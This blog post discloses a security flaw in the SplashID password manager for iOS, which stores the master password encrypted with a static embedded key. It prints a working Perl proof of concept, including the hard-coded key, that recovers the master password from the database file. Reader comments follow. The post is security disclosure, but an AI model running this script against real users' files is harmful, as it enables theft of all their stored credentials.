SplashID for iOS by @SplashData stores master password inside database: #security #fail

While at Black Hat Europe 2012 I attended an excellent talk by two Elcomsoft researchers. They investigated the security of mobile password mangers. Not surprisingly they are not all as safe as they should be. Some (free ones) do not bother to encrypt the stored passwords at all. Others fail to protect the master password to the database from being easily brute forced. Especially the use of PKCS7 padding makes brute forcing very fast (up to 50 million password guesses per second).

The most interesting result to me was the discovery that SplashID for iOS stores the master password inside the database that password is meant to protect. It is encrypted, but with a static key that is embedded in the program, and the same for all users. Based on this research I was able to write a proof of concept that takes the SplashIDDataBase.db file (from a jailbroken iPhone or iPad or from an iTunes backup) and displays the password for the database. With this it is trivial for an attacker with access to the SplashIDDataBase.db file to retrieve the master password and use it to read all the entries stored in the database. The script is shown below and can be downloaded here.

It seems that SplashData made a similar faux pas with SplashID Enterprise Safe. This makes me fear the worst for the other members of the SplashID software family.

This all shows that closed source security products are very hard to trust. Independent review is always needed to make sure no obvious vulnerabilities exist.

Here is the proof of concept code:

#!/usr/bin/perl

use DBI;
use Crypt::Blowfish;

$key = "g.;59?^/0n1X*{OQlRwy";

$dbh = DBI->connect( "dbi:SQLite:SplashIDDataBase.db" ) || die "Cannot connect: $DBI::errstr";

$sth = $dbh->prepare("SELECT PASSWORD from DATABASEINFOTABLE");
$numrows = $sth->execute;
$ref = $sth->fetchrow_hashref;
$cryptpwd = $ref->{PASSWORD};
$sth->finish;
$dbh->disconnect;

$cipher = new Crypt::Blowfish $key;

for($i=0;$i<length($cryptpwd);$i+=8) {
  $pwd = $cipher->decrypt(substr($cryptpwd,$i,8));
  print $pwd;
}
print "\n";

3 Responses to “SplashID for iOS by @SplashData stores master password inside database: #security #fail”

  1. eightnoneone Says:

    Have you tried this on the Mac desktop app? In some senses, that’s a higher risk as that OS is not as tightly sandboxed.

  2. Richard Says:

    The Mac desktop uses a different type of database. I don’t know if they made the same error there. Please note that the SplashID mobile database is present in iTunes backups, so still very vulnerable.

  3. @vard Says:

    I wonder why they didn’t review the eWallet passwordkeeper on the Iphone.

Leave a Comment